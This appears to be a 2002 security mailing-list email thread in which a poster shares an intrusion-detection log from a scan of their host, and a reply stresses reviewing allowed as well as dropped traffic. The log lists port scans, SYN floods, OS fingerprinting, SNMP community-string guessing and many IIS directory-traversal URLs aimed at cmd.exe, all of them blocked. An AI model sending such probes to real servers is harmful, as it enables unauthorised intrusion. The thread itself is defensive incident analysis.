You are right.  The most you can do is make note and pay attention to not only what 
was blocked, but perhaps what made it through.  Often when looking at firewall logs, 
my engineer looked only at drops, and never at the approved.  So one day, he told me 
about a particular port scan we got and I looked at all the logs for the attacker.  I 
found that they got through to an ftp server that accepted the packet.  Further 
analysis showed that the attacker attempted to gain root on the box.  My engineer 
didn't catch it again because he was only concerned with drops.

Mrcorp

-----Original Message-----
From: Mike V [mailto:[EMAIL PROTECTED]]
Sent: Monday, February 04, 2002 11:48 AM
To: Hornat, Charles; [EMAIL PROTECTED]
Subject: Re: Vulnerability scanners:


Since the scan included both a port scan,but attempts at various GET
requests and directories, even though port 80 was closed.  Thus, that rules
out anything like code red/nimda/sadmind worm, etc.  Seems much more like a
scanner checking for known vulnerabilities/brute force method.


below is the log information:

 timestamp (GMT)  issueName  parameters  victimPort
 2002-02-01 18:28:08  TCP port scan  port=1-32&reason=Firewalled 32

 2002-02-01 18:28:48  TCP port scan
port=65-112|114-314|321-544&reason=Firewalled 544

 2002-02-01 18:29:26  TCP port scan
port=545-570|589-832|857-1023&reason=Firewalled&name=Phase+Zero 1023

 2002-02-01 18:29:28  TCP port scan
port=1020-1023|1025|1027-1031|1033-1038|1040-1043|1045|1047-1053|1057-1058 0

 2002-02-01 18:29:30  SOCKS port probe  port=1080&reason=RSTsent 1080

 2002-02-01 18:29:31  TCP port scan
port=1028|1033|1035|1037-1038|1040|1043|1046-1048|1050-1051|1054|1056-1058|1
060-1065|1067-1070|1074-1081|1084-1087|1089-1095|1098-1111|1114-1116 0

 2002-02-01 18:29:34  TCP port scan
port=1114-1115|1146-1147|1149-1153|1157-1160 0

 2002-02-01 18:29:37  TCP port scan
port=1147-1148|1151|1153-1156|1158-1187|1189-1195|1197-1203|1205|1207-1218|1
220-1227|1231 0

 2002-02-01 18:29:39  SubSeven port probe
port=1243&name=Sub_7&reason=RSTsent 1243

 2002-02-01 18:29:41  TCP port scan
port=1207|1210|1212|1214-1216|1219|1221|1226-1255|1257-1260|1262-1271|1273-1
278|1280-1289|1291-1299|1302-1303|1307-1310 0

 2002-02-01 18:29:44  TCP port scan
port=1288-1290|1293-1299|1302-1307|1309-1310|1312-1317|1319-1337|1339-1344|1
346-1349|1351-1365|1367-1369|1373-1376|1380-1383 0

 2002-02-01 18:29:46  SQL port probe  port=1433&reason=RSTsent 1433

 2002-02-01 18:29:47  TCP port scan
port=1363-1371|1373-1377|1379-1392|1394-1398|1400-1411|1413-1425|1427-1432|1
434-1438|1440-1450|1454-1455 0

 2002-02-01 18:29:47  SQL port probe  port=1433&reason=RSTsent 1433

 2002-02-01 18:29:50  TCP port scan
port=1434-1435|1437-1438|1441-1442|1445-1446|1448-1451|1453-1460|1462-1464|1
467-1480|1482-1487|1489-1494|1496-1498|1502-1507|1509-1512|1514|1516-1520|15
24-1527 0

 2002-02-01 18:29:52  TCP port scan
port=1499-1500|1507-1508|1514-1518|1520-1526|1529|1531-1534|1536-1541|1545|1
548-1560 0

 2002-02-01 18:29:56  TCP port scan
port=1589-1592|1595-1619|1621-1626|1628-1632|1634-1637|1639-1640 0

 2002-02-01 18:29:59  TCP port scan
port=1615|1618-1625|1629-1633|1637-1659|1661-1688|1690-1693|1695-1696|1698-1
703|1706|1710-1713|1716-1717 0

 2002-02-01 18:30:00  PPTP port probe  port=1723&reason=RSTsent 1723

 2002-02-01 18:30:02  TCP port scan
port=1691-1692|1694-1695|1699-1700|1702-1703|1705-1709|1713-1718|1720-1748|1
750-1770|1772-1777|1780-1782|1786-1788 0

 2002-02-01 18:30:05  TCP port scan
port=1768-1775|1778-1783|1786-1791|1793-1799|1801-1836|1838-1847|1849-1851|1
855-1858 0

 2002-02-01 18:30:08  TCP port scan
port=1835-1836|1839-1841|1843-1844|1847-1848|1850-1855|1857-1863|1865-1868|1
870-1896|1898-1907|1909-1913|1915|1917-1918|1920-1923|1927-1929 0

 2002-02-01 18:30:11  TCP port scan
port=1906|1913-1914|1920-1926|1928-1937|1939-1942|1944-1968|1970-1976|1978-1
982|1986-1989|1993-1999|2003-2006 0

 2002-02-01 18:30:17  TCP port scan
port=1991|1995|1997-1999|2004|2006-2007|2010-2011|2031-2044|2046-2053|2055-2
070|2072-2075|2077-2080|2083-2097|2101-2104|2108-2111 0

 2002-02-01 18:30:20  TCP port scan
port=2082|2090|2092-2093|2096-2147|2151-2154|2156-2157 0

 2002-02-01 18:30:23  TCP port scan
port=2143|2156-2158|2160|2164-2176|2178|2180-2196|2198|2200-2206|2208-2212|2
214-2217|2219|2221-2224|2227-2230 0

 2002-02-01 18:30:26  TCP port scan
port=2209-2210|2214-2218|2220-2228|2230|2232|2234|2236-2248|2250-2258|2261-2
268|2271-2277|2279-2280|2283-2286|2288|2290-2292 0

 2002-02-01 18:30:30  TCP port scan
port=2280-2283|2288-2312|2314-2325|2327-2349|2351-2355|2359-2360|2364-2367 0

 2002-02-01 18:30:33  TCP port scan
port=2348|2350-2351|2354|2357-2359|2361-2368|2371-2390|2392-2402|2405-2416|2
418-2420|2422-2424|2428-2430|2434-2437|2441-2442 0

 2002-02-01 18:30:35  TCP port scan
port=2412|2415-2416|2420-2421|2423-2426|2428|2431-2438|2440|2444-2453|2465-2
468|2473-2477|2479-2482 0

 2002-02-01 18:30:38  TCP port scan
port=2468-2471|2474-2529|2531-2534|2536|2538-2541|2544-2545|2547-2548 0

 2002-02-01 18:30:42  TCP port scan
port=1029|2524-2527|2529-2530|2532|2535|2538|2540|2542-2547|2551-2570|2572-2
576|2578-2583|2585-2609|2611-2615|2619-2622|2626-2629 0

 2002-02-01 18:30:45  TCP port scan
port=2611|2613-2615|2618-2619|2621-2623|2626-2631|2633-2650|2652-2663|2665|2
667-2678|2680-2683|2687-2690|2694-2697|2701-2704 0

 2002-02-01 18:30:45  TCP port probe
port=1024-1025|1027-1028|1030-1060|1062-1066|1068-1079|1081|1083-1087|1089-1
116|1146-1242|1244-1432|1434-1542|1544-1560|1589-1719|1721-1722|1724-2011|20
31-2160|2164-2286|2288-2455|2465-2705&reason=RSTsent 2681

 2002-02-01 18:30:45  TCP port probe  port=2674-2714&reason=RSTsent 2697

 2002-02-01 18:30:46  TCP SYN flood  PercentFromIntruder=55&SYNs=119&DATAs=0
0

 2002-02-01 18:33:13  TCP port scan
port=2674|2676-2679|2681-2685|2687-2691|2693|2695-2719|2721-2736|2738-2743|2
745-2756|2759-2783|2786-2806|2809-2820|2822-2828|2830-2874|2877-2880|2883-28
87|2889-2892|2902-2916|2918-2946|2948-2958|2961-2965|2967-2970|2972-2979|298
1-2982|2984-2986|2988 0

 2002-02-01 18:34:49  TCP SYN flood  PercentFromIntruder=64&SYNs=124&DATAs=1
0

 2002-02-01 18:34:55  TCP SYN flood  PercentFromIntruder=56&SYNs=104&DATAs=1
0

 2002-02-01 18:34:56  TCP SYN flood  PercentFromIntruder=66&SYNs=111&DATAs=0
0

 2002-02-01 18:35:06  TCP SYN flood  PercentFromIntruder=68&SYNs=117&DATAs=0
0

 2002-02-01 18:35:07  TCP SYN flood  PercentFromIntruder=55&SYNs=129&DATAs=4
0

 2002-02-01 18:35:10  TCP SYN flood  PercentFromIntruder=62&SYNs=143&DATAs=4
0

 2002-02-01 18:35:16  TCP SYN flood  PercentFromIntruder=63&SYNs=129&DATAs=1
0

 2002-02-01 18:35:17  TCP SYN flood  PercentFromIntruder=55&SYNs=103&DATAs=0
0

 2002-02-01 18:35:19  TCP port scan
port=5898-5921|5923|5926-5930|5932-5959|5962-5978|5980-5984|5986-5992|5994-5
999|6001-6006|6008-6013|6015-6032|6034-6047|6049-6077|6079-6088|6090|6092-61
14|6116-6136|6138-6144|6146-6163|6165-6170|6173-6178|6181-6185|6188-6203|620
5-6231|6234-6258|6262 0

 2002-02-01 18:35:30  TCP SYN flood  PercentFromIntruder=56&SYNs=112&DATAs=0
0

 2002-02-01 18:35:37  TCP SYN flood  PercentFromIntruder=61&SYNs=128&DATAs=0
0

 2002-02-01 18:35:38  TCP SYN flood  PercentFromIntruder=57&SYNs=126&DATAs=0
0

 2002-02-01 18:35:48  TCP SYN flood
PercentFromIntruder=53|58&SYNs=119|135&DATAs=0|2 0

 2002-02-01 18:35:52  TCP SYN flood  PercentFromIntruder=65&SYNs=118&DATAs=0
0

 2002-02-01 18:35:58  TCP SYN flood  PercentFromIntruder=57&SYNs=133&DATAs=1
0

 2002-02-01 18:36:53  TCP port scan
port=6710-6711|6718|6722-6723|6726|6761-6771|6775-6810|6812-6835|6837-6854|6
856-6872|6875-6883|6885-6892|6894-6911|6913-6937|6939-6992|6994-7000|7002-70
29|7031-7040|7042-7053|7055-7077|7079-7106|7108-7118|7120-7125|7129-7134|713
6-7149|7153-7155|7157 0

 2002-02-01 18:38:20  TCP port scan
port=1~223|242~248|256~264|280~282|308~321|344~600|606~611|628|633~640|650|6
66|704|709|729~731|737~786|799~801|871|888|911|989~1001|1008~1015|1023|merge
range(4)&reason=Firewalled|mergerange(4)&name=Phase+Zero|mergerange(4) 1023

 2002-02-01 18:38:34  TCP port scan
port=1024-1026|1030|1045|1058-1059|1067|1084|1090|1103|1127|1155|1167|1170|1
234|1241|1243|1245|1347-1350|1354-1357|1361-1364|1368-1371|1375-1378|1382-13
85|1389-1392|1396-1399|1403-1406|1410-1413|1417-1420|1424-1427|1430-1433|143
7-1440|1544-1547|1552 0

 2002-02-01 18:38:52  TCP port scan
port=1-3|5|7|9|11|13|15|17-25|27|29|31|33|35|37-39|41-223|242-248|256-264|28
0-282|308-317|321|344-444|446-448|464-533|65301&reason=Firewalled 533

 2002-02-01 18:38:55  TCP port scan
port=534-563&reason=Firewalled&name=Phase+Zero 563

 2002-02-01 18:39:07  TCP port scan
port=564-600|606-611|628|633-636|640|650|666|704|709|729-731|737|740-742|744
|747-754|758-765|767|769-775|993|995-1001|1008|1010-1012|1015|1023&reason=Fi
rewalled 1023

 2002-02-01 18:39:14  TCP SYN flood
PercentFromIntruder=59|62&SYNs=110-111&DATAs=0 0

 2002-02-01 18:39:15  TCP port scan
port=1446-1449|1453-1456|1460-1463|1467-1470|1474-1477|1481-1484|1488-1491|1
495-1498|1502-1505|1509-1512|1516-1519|1523-1526|1530-1533|1537-1540|1647-16
50|1654-1657|1661-1664|1668-1671|1675-1677|1723|1827|1981|1986-1987|1991-199
4|1998-2001|2005-2008 0

 2002-02-01 18:39:23  TCP port scan
port=1~223|242~248|256~264|280~282|308~317|321|344~600|606~611|628|633~636|6
40|650|666|704|709|729~731|737|740~744|747~754|758~776|780~783|786|799~801|8
71|mergerange(2)&reason=Firewalled|mergerange(2)&name=Phase+Zero|mergerange(
2) 871

 2002-02-01 18:39:24  TCP SYN flood  PercentFromIntruder=63&SYNs=134&DATAs=2
0

 2002-02-01 18:39:33  TCP port scan
port=1~223|242~248|256~264|280~282|308~321|344~600|606~611|628|633~640|650|6
66|704|709|729~731|737~786|799~801|871|888|911|989~997|7007|mergerange(4)&re
ason=Firewalled|mergerange(4)&name=Phase+Zero|mergerange(4) 997

 2002-02-01 18:39:34  TCP SYN flood  PercentFromIntruder=60&SYNs=138&DATAs=7
0

 2002-02-01 18:39:40  NMAP OS fingerprint
port=1024|1026&flags=S&options=wscale:10;maxseg:265;time:1061109567-0 1024

 2002-02-01 18:39:40  TCP ACK ping
port=1024|1026&flags=A&options=wscale:10;maxseg:265;time:1061109567-0 1024

 2002-02-01 18:39:41  TCP OS fingerprint
port=1024|1026&flags=FPU|SFPU&options=wscale:10;maxseg:265;time:1061109567-0
1024

 2002-02-01 18:39:44  TCP OS fingerprint
port=1024|1026&flags=FPU|SFPU&options=wscale:10;maxseg:265;time:1061109567-0
1024

 2002-02-01 18:39:45  TCP OS fingerprint
port=1024|1026&flags=FPU|SFPU&options=wscale:10;maxseg:265;time:1061109567-0
1024

 2002-02-01 18:39:45  UDP port probe  port=1024&reason=ICMPsent 1024

 2002-02-01 18:40:03  NMAP OS fingerprint
port=1024|1026&flags=S&options=wscale:10;maxseg:265;time:1061109567-0 1024

 2002-02-01 18:40:03  TCP ACK ping
port=1024|1026&flags=A&options=wscale:10;maxseg:265;time:1061109567-0 1024

 2002-02-01 18:40:05  TCP OS fingerprint
port=1024|1026&flags=FPU|SFPU&options=wscale:10;maxseg:265;time:1061109567-0
1024

 2002-02-01 18:40:08  TCP OS fingerprint
port=1024|1026&flags=FPU|SFPU&options=wscale:10;maxseg:265;time:1061109567-0
1024

 2002-02-01 18:40:09  TCP OS fingerprint
port=1024|1026&flags=FPU|SFPU&options=wscale:10;maxseg:265;time:1061109567-0
1024

 2002-02-01 18:40:09  UDP port probe  port=1024&reason=ICMPsent 1024

 2002-02-01 18:40:30  NMAP OS fingerprint
port=1024|1026&flags=S&options=wscale:10;maxseg:265;time:1061109567-0 1024

 2002-02-01 18:40:30  TCP ACK ping
port=1024|1026&flags=A&options=wscale:10;maxseg:265;time:1061109567-0 1024

 2002-02-01 18:40:30  TCP OS fingerprint
port=1024|1026&flags=FPU|SFPU&options=wscale:10;maxseg:265;time:1061109567-0
1024

 2002-02-01 18:40:32  TCP OS fingerprint
port=1024|1026&flags=FPU|SFPU&options=wscale:10;maxseg:265;time:1061109567-0
1024

 2002-02-01 18:40:32  UDP port probe  port=1024&reason=ICMPsent 1024

 2002-02-01 18:40:46  NMAP OS fingerprint
port=1026&flags=S&options=wscale:10;maxseg:265;time:1061109567-0 1026

 2002-02-01 18:40:51  HTTP URL with +.htr appended
URL=/default.asp+.htr|/iisstart.asp+.htr&arg=&accessed=no&code=404 5800

 2002-02-01 18:40:51  HTTP URL with +.htr appended
URL=/iisstart.asp+.htr&accessed=no&code=404 5800

 2002-02-01 18:40:51  HTTP URL scan
count=4&URL=/cgi-bin/htimage.exe|/default.asp+.htr|/default.asp\|/iisstart.a
sp+.htr|/iisstart.asp\|/localstart.asp\|/main.asp\|/rettest.ida 5800

 2002-02-01 18:40:51  HTTP asp with \ appended
URL=/default.asp\|/iisstart.asp\|/localstart.asp\|/main.asp\&arg=&accessed=n
o&code=404 5800

 2002-02-01 18:40:51  HTTP asp with \ appended
URL=/iisstart.asp\|/localstart.asp\|/main.asp\&accessed=no&code=404 5800

 2002-02-01 18:40:51  IIS .printer overflow
length=257&URL=/null.printer&accessed=no&code=404 5800

 2002-02-01 18:40:52  HTTP URL with +.htr appended
URL=/localstart.asp+.htr&arg=&accessed=no&code=404 5800

 2002-02-01 18:40:52  HTTP URL with +.htr appended
URL=/global.asa+.htr|/index.asp+.htr|/main.asp+.htr|/start.asp+.htr&arg=&acc
essed=no&code=404 5800

 2002-02-01 18:40:52  HTTP URL with +.htr appended
URL=/global.asa+.htr|/index.asp+.htr|/start.asp+.htr&accessed=no&code=404
5800

 2002-02-01 18:40:52  HTTP asp with \ appended
URL=/index.asp\|/start.asp\&arg=&accessed=no&code=404 5800

 2002-02-01 18:40:52  IIS system32 command
URL=/scripts/..%255c../..%255c../..%255c../winnt/system32/cmd.exe&arg=/c+dir
&accessed=no&code=404 5800

 2002-02-01 18:40:52  HTTP asp with \ appended
URL=/index.asp\&accessed=no&code=404 5800

 2002-02-01 18:40:52  IIS system32 command
URL=/IISADMPWD/...%259v..%25c.%259v..%25c.%259v..%25c.%259v..%25c.%259v..%25
c.%259v..%25c.%259v..%25c.%259v/winnt/system32/cmd.exe|/cgi-bin/...%259v..%2
5c.%259v..%25c.%259v..%25c.%259v..%25c.%259v..%25c.%259v..%25c.%259v..%25c.%
259v/winnt/system32/cmd.exe| 5800

 2002-02-01 18:40:53  bat URL type
URL=/cgi-dos/args.bat&arg=&accessed=no&code=404 5800

 2002-02-01 18:40:53  HTTP UTF8 backtick
URL=/IISADMPWD/../../../../../../../..//winnt/system32/cmd.exe|/cgi-bin/../.
./../../../../../..//winnt/system32/cmd.exe|/msadc/../../../../../../../..//
winnt/system32/cmd.exe|/scripts/../../../../../../../..//winnt/system32/cmd.
exe 5800

 2002-02-01 18:40:53  IIS system32 command
URL=/IISADMPWD/../../../../../../../..//winnt/system32/cmd.exe|/cgi-bin/../.
./../../../../../..//winnt/system32/cmd.exe|/msadc/../../../../../../../..//
winnt/system32/cmd.exe|/scripts/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/wi
nnt/system32/cmd.exe| 5800

 2002-02-01 18:40:54  CGI campas
URL=/cgi-bin/campas&arg=&accessed=no&code=404 5800

 2002-02-01 18:40:54  IIS system32 command
URL=/IISADMPWD/...%25qf..%25c.%25qf..%25c.%25qf..%25c.%25qf..%25c.%25qf..%25
c.%25qf..%25c.%25qf..%25c.%25qf/winnt/system32/cmd.exe|/cgi-bin/...%25qf..%2
5c.%25qf..%25c.%25qf..%25c.%25qf..%25c.%25qf..%25c.%25qf..%25c.%25qf..%25c.%
25qf/winnt/system32/cmd.exe| 5800

 2002-02-01 18:40:54  Cold Fusion sample URL
URL=/cfdocs/expeval/exprcalc.cfm&arg=&accessed=no&code=404 5800

 2002-02-01 18:40:55  HTTP URL scan
count=4&URL=/IISADMPWD/..%255c../..%255c../..%255c../winnt/system32/cmd.exe|
/IISADMPWD/...%258s..%25c.%258s..%25c.%258s..%25c.%258s..%25c.%258s..%25c.%2
58s..%25c.%258s..%25c.%258s/winnt/system32/cmd.exe| 5800

 2002-02-01 18:40:55  IIS system32 command
URL=/IISADMPWD/..%255c../..%255c../..%255c../winnt/system32/cmd.exe|/IISADMP
WD/...%258s..%25c.%258s..%25c.%258s..%25c.%258s..%25c.%258s..%25c.%258s..%25
c.%258s..%25c.%258s/winnt/system32/cmd.exe|/cgi-bin/...%258s..%25c.%258s..%2
5c.%258s..%25c.%258s..%25c.%258s..%25c.%258s..%25c.%258s..%25c.%258s/winnt/s
ystem32/cmd.exe 5800

 2002-02-01 18:40:55  Cold Fusion sample URL
URL=/cfdocs/expeval/sendmail.cfm&arg=&accessed=no&code=404 5800

 2002-02-01 18:40:55  IIS system32 command
URL=/IISADMPWD/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.
exe|/IISADMPWD/..\..\..\..\..\..\..\..\/winnt/system32/cmd.exe|/_vti_bin/../
../../../../../../..//winnt/system32/cmd.exe|/cgi-bin/..\..\..\..\..\..\..\.
.\/winnt/system32/cmd.exe| 5800

 2002-02-01 18:40:56  IIS system32 command
URL=/IISADMPWD/%252e%252e%252f%252e%252e/%252e%252e%252f%252e%252e/%252e%252
e%252f%252e%252e/winnt/system32/cmd.exe|/IISADMPWD/...%25pc..%25c.%25pc..%25
c.%25pc..%25c.%25pc..%25c.%25pc..%25c.%25pc..%25c.%25pc..%25c.%25pc/winnt/sy
stem32/cmd.exe| 5800

 2002-02-01 18:40:56  SNMP backdoor
community=all_private|community|default|network|openview|password|private|se
cret|tivoli&product=Sun 161

 2002-02-01 18:40:56  SNMP Crack  community=admin|worldread 161

 2002-02-01 18:40:56  SNMP port probe  port=161&reason=Firewalled 161

 2002-02-01 18:40:57  CGI htmlscript
URL=/cgi-bin/htmlscript&arg=&accessed=no&code=404 5800

 2002-02-01 18:40:57  HTTP UTF8 backtick
URL=/IISADMPWD/..\..\..\..\..\..\..\..\/winnt/system32/cmd.exe|/_vti_bin/../
../../../../../../..//winnt/system32/cmd.exe|/_vti_bin/..\..\..\..\..\..\..\
..\/winnt/system32/cmd.exe|/cgi-bin/..\..\..\..\..\..\..\..\/winnt/system32/
cmd.exe| 5800

 2002-02-01 18:40:57  HTTP URL scan
count=4&URL=/IISADMPWD/%252e%252e%252f%252e%252e/%252e%252e%252f%252e%252e/%
252e%252e%252f%252e%252e/winnt/system32/cmd.exe|/IISADMPWD/.%252e/.%252e/.%2
52e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe| 5800

 2002-02-01 18:40:57  IIS system32 command
URL=/_vti_bin/...%258s..%25c.%258s..%25c.%258s..%25c.%258s..%25c.%258s..%25c
.%258s..%25c.%258s..%25c.%258s/winnt/system32/cmd.exe|/_vti_bin/..\..\..\..\
..\..\..\..\/winnt/system32/cmd.exe|/msadc/.%252e/.%252e/.%252e/.%252e/.%252
e/.%252e/winnt/system32/cmd.exe| 5800

 2002-02-01 18:40:57  IIS system32 command
URL=/IISADMPWD/%252e%252e%252f%252e%252e/%252e%252e%252f%252e%252e/%252e%252
e%252f%252e%252e/winnt/system32/cmd.exe|/IISADMPWD/.%252e/.%252e/.%252e/.%25
2e/.%252e/.%252e/winnt/system32/cmd.exe|/IISADMPWD/..%255c../..%255c../..%25
5c../winnt/system32/cmd.exe| 5800

 2002-02-01 18:40:57  CGI mlog.html
URL=/mlog.html&arg=&accessed=no&code=404 5800

 2002-02-01 18:40:58  CGI mylog.html
URL=/mylog.html&arg=&accessed=no&code=404 5800

 2002-02-01 18:40:58  IIS system32 command
URL=/_vti_bin/...%25pc..%25c.%25pc..%25c.%25pc..%25c.%25pc..%25c.%25pc..%25c
.%25pc..%25c.%25pc..%25c.%25pc/winnt/system32/cmd.exe&arg=/c_dir&accessed=no
&code=404 5800

 2002-02-01 18:40:58  IIS system32 command
URL=/msadc/%252e%252e%252f%252e%252e/%252e%252e%252f%252e%252e/%252e%252e%25
2f%252e%252e/winnt/system32/cmd.exe&arg=/c+dir&accessed=no&code=404 5800

 2002-02-01 18:40:58  CGI nph-test-cgi
URL=/cgi-bin/nph-test-cgi&arg=&accessed=no&code=404 5800

 2002-02-01 18:40:58  CGI phf  URL=/cgi-bin/phf&arg=&accessed=no&code=404
5800

 2002-02-01 18:40:58  HTTP cgi starting with php
URL=/cgi-bin/php.cgi&arg=&accessed=no&code=404 5800

 2002-02-01 18:40:58  IIS system32 command
URL=/cgi-bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe&arg=/c+dir
&accessed=no&code=404 5800

 2002-02-01 18:40:59  CGI test-cgi
URL=/cgi-bin/test-cgi&arg=&accessed=no&code=404 5800

 2002-02-01 18:40:59  CGI view-source
URL=/cgi-bin/view-source&arg=&accessed=no&code=404 5800

 2002-02-01 18:40:59  IIS system32 command
URL=/cgi-bin/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.ex
e&arg=/c+dir&accessed=no&code=404 5800

 2002-02-01 18:40:59  CGI webdist.cgi
URL=/cgi-bin/webdist.cgi&arg=&accessed=no&code=404 5800

 2002-02-01 18:40:59  CGI websendmail
URL=/cgi-bin/websendmail&arg=&accessed=no&code=404 5800

 2002-02-01 18:40:59  CGI webgais
URL=/cgi-bin/webgais&arg=&accessed=no&code=404 5800

 2002-02-01 18:41:00  IIS system32 command
URL=/cgi-bin/%252e%252e%252f%252e%252e/%252e%252e%252f%252e%252e/%252e%252e%
252f%252e%252e/winnt/system32/cmd.exe&arg=/c+dir&accessed=no&code=404 5800

 2002-02-01 18:41:00  Site Server sample URL
URL=/adsamples/config/site.csc&arg=&accessed=no&code=404 5800

 2002-02-01 18:41:01  IIS system32 command
URL=/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe&arg=/c+di
r&accessed=no&code=404 5800

 2002-02-01 18:41:01  CGI newdsn.exe
URL=/scripts/tools/newdsn.exe&arg=&accessed=no&code=404 5800

 2002-02-01 18:41:01  IIS system32 command
URL=/_vti_bin/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.e
xe&arg=/c+dir&accessed=no&code=404 5800

 2002-02-01 18:41:01  CGI win-c-sample.exe
URL=/cgi-shl/win-c-sample.exe&arg=&accessed=no&code=404 5800

 2002-02-01 18:41:02  IIS system32 command
URL=/_vti_bin/%252e%252e%252f%252e%252e/%252e%252e%252f%252e%252e/%252e%252e
%252f%252e%252e/winnt/system32/cmd.exe&arg=/c+dir&accessed=no&code=404 5800

 2002-02-01 18:41:03  CGI rguest.exe
URL=/cgi-bin/rguest.exe&arg=&accessed=no&code=404 5800

 2002-02-01 18:41:03  HTTP URL scan
count=4&URL=/ROADS/cgi-bin/search.pl|/_vti_bin/%252e%252e%252f%252e%252e/%25
2e%252e%252f%252e%252e/%252e%252e%252f%252e%252e/winnt/system32/cmd.exe|/_vt
i_bin/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe|/_vti
_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe| 5800

 2002-02-01 18:41:03  CGI wguest.exe
URL=/cgi-bin/wguest.exe&arg=&accessed=no&code=404 5800

 2002-02-01 18:41:03  Shopping cart order URL
URL=/mall_log_files/order.log&arg=&accessed=no&code=404 5800

 2002-02-01 18:41:03  Shopping cart order URL
URL=PDG_Cart/order.log&arg=&accessed=no&code=404 5800

 2002-02-01 18:41:04  WebStore admin URL
URL=/Admin_files/order.log&arg=&accessed=no&code=404 5800

 2002-02-01 18:41:05  Cold Fusion sample URL
URL=/cfdocs/expeval/displayopenedfile.cfm&arg=&accessed=no&code=404 5800

 2002-02-01 18:41:05  Cold Fusion sample URL
URL=/cfdocs/expeval/exprcalc.cfm&arg=&accessed=no&code=404 5800

 2002-02-01 18:41:05  Cold Fusion sample URL
URL=/cfdocs/expeval/openfile.cfm&arg=&accessed=no&code=404 5800

 2002-02-01 18:41:05  HTTP URL scan
count=4&URL=/Admin_files/order.log|/_vti_pvt/authors.pwd|/cfdocs/expeval/dis
playopenedfile.cfm|/cfdocs/expeval/exprcalc.cfm|/cfdocs/expeval/openfile.cfm
|/cgi-bin/bash|/cgi-bin/perl|/cgi-bin/rksh|/cgi-bin/sh|/cgi-bin/tcsh|/mall_l
og_files/order.log| 5800

 2002-02-01 18:41:05  FrontPage service.pwd
URL=/_vti_pvt/service.pwd&arg=&accessed=no&code=404 5800

 2002-02-01 18:41:06  IIS sample URL
URL=/msadc/Samples/SELECTOR/showcode.asp&arg=&accessed=no&code=404 5800

 2002-02-01 18:41:24  TCP port scan
port=80|1024|1026|5800|5900&reason=Firewalled 80

 2002-02-01 18:41:27  HTTP port probe  port=80&reason=Firewalled 80

 2002-02-01 18:41:33  HTTP port probe  port=80&reason=Firewalled 80

 2002-02-01 18:41:48  HTTP port probe  port=80&reason=Firewalled 80





________________________________________________________________
The information contained in this message is intended only for the recipient, may be 
privileged and confidential and protected from disclosure. If the reader of this 
message is not the intended recipient, or an employee or agent responsible for 
delivering this message to the intended recipient, please be aware that any 
dissemination or copying of this communication is strictly prohibited. If you have 
received this communication in error, please immediately notify us by replying to the 
message and deleting it from your computer.

Thank you,
Standard & Poor's

Reply via email to